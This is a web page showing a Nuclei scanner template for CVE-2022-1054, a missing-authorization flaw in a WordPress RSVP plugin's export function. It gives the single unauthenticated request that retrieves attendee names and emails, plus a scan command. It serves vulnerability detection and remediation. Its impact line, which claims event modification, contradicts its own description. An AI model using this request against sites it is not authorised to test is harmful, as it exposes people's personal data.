Skip to content

WordPress RSVP and Event Management <2.7.8 - Missing Authorization

ID: CVE-2022-1054

Severity: medium

Author: Akincibor

Tags: cve,cve2022,wordpress,wpscan,wp,wp-plugin,wpchill

WordPress RSVP and Event Management plugin before 2.7.8 is susceptible to missing authorization. The plugin does not have any authorization checks when exporting its entries, and the export function is hooked to the init action. An attacker can potentially retrieve sensitive information such as first name, last name, and email address of users registered for events,

id: CVE-2022-1054
info:
name: WordPress RSVP and Event Management <2.7.8 - Missing Authorization
author: Akincibor
severity: medium
description: WordPress RSVP and Event Management plugin before 2.7.8 is susceptible to missing authorization. The plugin does not have any authorization checks when exporting its entries, and the export function is hooked to the init action. An attacker can potentially retrieve sensitive information such as first name, last name, and email address of users registered for events,
impact: |
An attacker can exploit this vulnerability to perform unauthorized actions, such as creating, modifying, or deleting events.
remediation: |
Update the WordPress RSVP and Event Management plugin to version 2.7.8 or later.
reference:
- https://wpscan.com/vulnerability/95a5fad1-e823-4571-8640-19bf5436578d
- https://github.com/ARPSyndicate/cvemon
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2022-1054
cwe-id: CWE-862
epss-score: 0.00292
epss-percentile: 0.69101
cpe: cpe:2.3:a:wpchill:rsvp_and_event_management:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
vendor: wpchill
product: rsvp_and_event_management
framework: wordpress
tags: cve,cve2022,wordpress,wpscan,wp,wp-plugin,wpchill
http:
- method: GET
path:
- '{{BaseURL}}/wp-admin/admin.php?page=rsvp-admin-export'
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'RSVP Status'
- '"First Name"'
condition: and
- type: status
status:
- 200
# digest: 4a0a0047304502202562ad9a8a2fbd05851d347e2467c3bc21a04869993dc4c3f13299e765154354022100cc99bdc6537feb1ec0f68e18d31ffd39fc05e7b9c935fccd6aa7bba0f96a456f:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-1054.yaml"

View on Github